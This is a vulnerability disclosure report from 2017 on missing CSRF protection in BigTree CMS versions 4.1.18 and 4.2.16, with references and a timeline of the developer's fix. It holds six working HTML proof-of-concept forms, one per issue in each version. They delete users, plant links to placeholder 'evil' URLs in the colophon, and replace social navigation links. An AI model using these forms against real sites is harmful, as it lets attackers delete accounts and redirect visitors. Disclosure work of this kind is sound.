Multiple Security Issue of CSRF at Few Parameters – v4.1.18 and v4.2.16
I. ABSTRACT
As quoted from the official site of BigTree CMS, BigTree CMS is an open source content management system built on PHP and MySQL. It was created by – and for – user experience and content strategy experts. BigTree’s user system is designed for a single webmaster or large distributed teams. Users can be editors or publishers of a single page or the entire site.
Since the CMS has been acknowledge at the worldwide and having so much customer, then BigTree CMS Team realize if they should add common protection (security best practice) to securing the customer when using its CMS.
Figure 1 Some of Release Note related Security Fixed
II. INTRODUCTION
2.1. Cross Site Request Forgery (CSRF)
Generally, CSRF is an attack that “forces” a user to do something that is basically “unwanted” in a web based application by utilizing the circumstance of the victim that is being authorized (login). In general, this kind of attack could be used because the absence of authentication process in doing a change or the absence of unique token that can allowed to process the related matter (the uniqueness of the token is usually given so the user wouldn’t be troubled by typing password to changes that are not quite significant).
In this situation, the problem related lack of CSRF token could be found at a few features such as Colophon Changing (like a feature to change a web footer easily), User Deletion, and Navigation Social Changing (changing the URL to the malicious one).
Please kindly note, as we learn a few things at BigTree CMS, we found that the protection is given with the needs of “Referrer” header of the HTTP/S Request. For example, when we tried to do a PoC of CSRF at the “Added User” Feature, the feature needs the “Referrer” parameter to “completely finishing” the PoC. But at those 3 (three) mentioned feature, the protection is not given yet.
2.2. Colophon Feature
In simple, this feature allows the users to write their own footer at the sidebar. By default, the value of Colophon is “Built on BigTree CMS” with embedded URL at the Product Name.
2.3. Nav-Soc Feature (Navigation Social)
The feature allows the users to put their own social network with the provided URL and logos to the sidebar that exist at the application.
III. SUMMARY OF ISSUE
As it has been delivered before, the security problem in this report has a relation with “Lack of CSRF Token” at separated parameter that could affects some changes like:
3.1. Deleting the Registered User at Application;
3.2. Change the Colophon Information at Application; and
3.3. Change the Navigation Social at Application.
IV. INFORMATION AND SITUATION OF THIS POC
To be able to understand the existed problem, this section will be re-explaining the problem specifically about some information which is related to the general running process or even the root of the existed problem.
4.1. Deleting the Registered User with CSRF
When user trying to delete the registered user, then the application automatically will send a request that contain a single parameter, which is ID.
Figure 2 Requesting the Parameter to Delete the Registered User (v4.1.18)
With the simple html script, then we could use that vulnerability to force the user to delete the registered user at application. The script could be like this (for BigTree CMS v4.1.18):
<html>
<body>
<form action="http://affectedURL/admin/ajax/users/delete/" method="POST">
<input type="hidden" name="id" value="4" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Table 1: HTML File to Delete the Registered User – BigTree CMS v4.1.18
When the victim click the button that setup by the provided .html file, then the victim will automatically will delete the registered user that push by the ID.
And here is the script for BigTree CMS v4.2.16: (Please kindly note, the provided URL between this version and the previous version is different):
<html>
<body>
<form action="http://affectedURL/site/index.php/admin/ajax/users/delete/" method="POST">
<input type="hidden" name="id" value="5" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Table 2: HTML File to Delete the Registered User – BigTree CMS v4.2.16
When the victim click the button that setup by the provided .html file, then the victim will automatically will delete the registered user at the application.
4.2. Change the Colophon with CSRF
When user trying to change their Colophon, then the application automatically will send a request that contain a few parameters, which are Max_File_Size, _bigtree_post_check, id, and colophon.
Figure 3 Requesting the Parameter to Change the Colophon (v4.1.18)
With the simple html script, then we could use that vulnerability to force the user to delete the registered user at application. The script could be like this (for v.4.1.18):
<html>
<body>
<form action=”http://AffectedURL/admin/settings/update/” method=”POST” enctype=”multipart/form-data”>
<input type=”hidden” name=”MAX_FILE_SIZE” value=”2097152″ />
<input type=”hidden” name=”_bigtree_post_check” value=”success” />
<input type=”hidden” name=”id” value=”colophon” />
<input type=”hidden” name=”colophon” value=”<p>Illegal Changes with CSRF at v.4.1.18. Please visit <a title=’Evil’ href=’http://www.evilurl.com’>Evil URL</a>/</p>” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Table 3: HTML File to Change the Colophon at v4.1.18
And here is the script for BigTree CMS v4.2.16: Please kindly note that the parameters that sent by the Application has a little different with the previous version. In this situation, the parameters are Max_File_Size, _bigtree_post_check, id, and value.
<html>
<body>
<form action=”http://AffectedURL/site/index.php/admin/settings/update/” method=”POST” enctype=”multipart/form-data”>
<input type=”hidden” name=”MAX_FILE_SIZE” value=”2097152″ />
<input type=”hidden” name=”_bigtree_post_check” value=”success” />
<input type=”hidden” name=”id” value=”colophon” />
<input type=”hidden” name=”value” value=”<p>Illegal Changes with CSRF. Please visit <a title=’Evil’ href=’http://www.evilurl.com’>Evil URL</a>/</p>” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Table 4: HTML File to Change the Colophon at v4.2.16
When the victim click the button that setup by the provided .html file, then the victim will automatically will change the colophon as the Attacker wants.
4.3. Change the Navigation Social with CSRF
When user trying to change the Navigation Social, the application will automatically send a request that contain a few parameters, which are Max_File_Size, _bigtree_post_check, id, and nav-social[x] with x could be change to number from 0.
Figure 4 Requesting the Parameter to Change the Colophon (v4.1.18)
With the simple html script, then we could use that vulnerability to force the user to delete the registered user at application. The script could be like this (for v.4.1.18):
<html>
<body>
<form action=”http://AffectedURL/admin/settings/update/” method=”POST” enctype=”multipart/form-data”>
<input type=”hidden” name=”MAX_FILE_SIZE” value=”2097152″ />
<input type=”hidden” name=”_bigtree_post_check” value=”success” />
<input type=”hidden” name=”id” value=”nav-social” />
<input type=”hidden” name=”nav-social[0]” value='{“title”:”EvilFB”,”link”:”https:\/\/evilfburl.com\/”,”class”:”facebook”}’ />
<input type=”hidden” name=”nav-social[1]” value='{“title”:”EvilTwitter”,”link”:”https:\/\/eviltwitterurl.com\/”,”class”:”twitter”}’ />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Table 5: HTML File to Change the Navigation Social at v4.1.18
And here is the script for BigTree CMS v4.2.16. Please kindly note that the parameters that sent by the Application has a little different with the previous version. In this situation, the parameters are Max_File_Size, _bigtree_post_check, id, value[x][__internal-title], value[x][__title], value[x][link], value[x][class], value[x][__internal-title], and value[x][__internal-subtitle].
The x character could be start from 0 to the latest one (depends to the value on the database. If the value 3 is ever deleted, then we could start from 4. But it doesn’t mind if we try to change the value 0 and 1).
<html>
<body>
<form action=”http://AffectedURL/site/index.php/admin/settings/update/” method=”POST” enctype=”multipart/form-data”>
<input type=”hidden” name=”MAX_FILE_SIZE” value=”2097152″ />
<input type=”hidden” name=”_bigtree_post_check” value=”success” />
<input type=”hidden” name=”id” value=”nav-social” />
<input type=”hidden” name=”value[0][__internal-title]” value=”GitHub” />
<input type=”hidden” name=”value[0][__internal-subtitle]” value=”” />
<input type=”hidden” name=”value[0][title]” value=”GitHub” />
<input type=”hidden” name=”value[0][link]” value=”https://github.com/bigtreecms/BigTree-CMS” />
<input type=”hidden” name=”value[0][class]” value=”github” />
<input type=”hidden” name=”value[0][__internal-title]” value=”GitHub” />
<input type=”hidden” name=”value[0][__internal-subtitle]” value=”” />
<input type=”hidden” name=”value[1][__internal-title]” value=”Twitter” />
<input type=”hidden” name=”value[1][__internal-subtitle]” value=”” />
<input type=”hidden” name=”value[1][title]” value=”Twitter” />
<input type=”hidden” name=”value[1][link]” value=”https://twitter.com/bigtreecms” />
<input type=”hidden” name=”value[1][class]” value=”twitter” />
<input type=”hidden” name=”value[1][__internal-title]” value=”Twitter” />
<input type=”hidden” name=”value[1][__internal-subtitle]” value=”” />
<input type=”hidden” name=”value[2][__internal-title]” value=”Facebook” />
<input type=”hidden” name=”value[2][__internal-subtitle]” value=”” />
<input type=”hidden” name=”value[2][title]” value=”Facebook” />
<input type=”hidden” name=”value[2][link]” value=”https://www.facebook.com/BigTreeCms” />
<input type=”hidden” name=”value[2][class]” value=”facebook” />
<input type=”hidden” name=”value[2][__internal-title]” value=”Facebook” />
<input type=”hidden” name=”value[2][__internal-subtitle]” value=”” />
<input type=”hidden” name=”value[4][title]” value=”CSRFEvilURL” />
<input type=”hidden” name=”value[4][link]” value=”http://csrfevilurl.com” />
<input type=”hidden” name=”value[4][class]” value=”facebook” />
<input type=”hidden” name=”value[4][__internal-title]” value=”CSRFEvilURL” />
<input type=”hidden” name=”value[4][__internal-subtitle]” value=”” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Table 5: HTML File to Change the Colophon at v4.2.16
When the victim click the button that setup by the provided .html file, then the victim will automatically will change the colophon as the Attacker wants.
V. ADDITIONAL INFORMATION
For completing the explanation, here are the videos that could explained the information (Unlisted at Youtube):
5.1. PoC – CSRF at User Deletion in v4.1.18: https://youtu.be/EfiVS_5IwMc
5.2. PoC – CSRF at Colophon in v4.1.18: https://youtu.be/9Mbg8BnDWKo
5.3. PoC – CSRF at Navigation Social in v4.1.18: https://youtu.be/cWOLzDwZtOg
5.4. PoC – CSRF at User Deletion in v4.2.16: https://youtu.be/-ZW8Tynvgf0
5.5. PoC – CSRF at Colophon in v4.2.16: https://youtu.be/MU3W7D94eTA
5.6. PoC – CSRF at Navigation Social in v4.2.16: https://youtu.be/ec98fn7ZRVg
VI. REFERENCES
6.1. PCI DSS v3.2 point 6.5.9 (for CSRF);
6.2. CAPEC-62: Cross Site Request Forgery;
6.3. CWE-352: Cross-Site Request Forgery;
6.4. https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF);
6.5. https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)
6.6. CVEs Release: CVE-2017-6914, CVE-2017-6915, CVE-2017-6916, CVE-2017-6917, CVE-2017-6918
VII. RESPONSE AND TIMELINE OF REPORTING
Tim (BigTree CMS Developer) has responded the report very fast.
- Mar 14th, 2017 – Report v0.1 was sent via email;
- Mar 15th, 2017 – Tim replied the message. “Thank you for the disclosure! We’ll be sure to get fixes in for these issues by the end of the week.”;
- Mar 15th, 2017 – We response the reply and Opening a ticket at GitHub. (Report v0.2);
- Mar 17th, 2017 – Status update from Tim via email. “Thanks again for catching these issues, Yoko! I’ve pushed updates to GitHub that should resolve all outstanding CSRF issues and a new release of BigTree containing the fixes will be issued next week (probably Friday)”;
- Mar 17th, 2017 – Status update via GitHub (could be found at here);
Download the paper directly from here:
